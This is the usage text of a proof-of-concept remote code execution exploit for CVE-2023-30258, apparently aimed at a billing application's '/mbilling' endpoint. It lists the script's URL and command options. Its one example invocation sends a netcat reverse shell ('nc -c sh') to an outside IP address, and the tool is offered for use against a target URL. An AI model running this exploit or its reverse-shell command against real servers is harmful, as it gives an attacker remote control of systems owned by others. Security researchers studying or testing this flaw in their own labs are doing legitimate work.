
POC para CVE-2023-30258-RCE por n0o0b
POC para CVE-2023-30258-RCE por n0o0b
usage: poc.py [-h] [-u URL] [-c CMD]
example. python poc.py -u http://10.10.69.34/mbilling --cmd "nc -c sh 10.21.126.163 8888"
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-c CMD, --cmd CMD Command to execute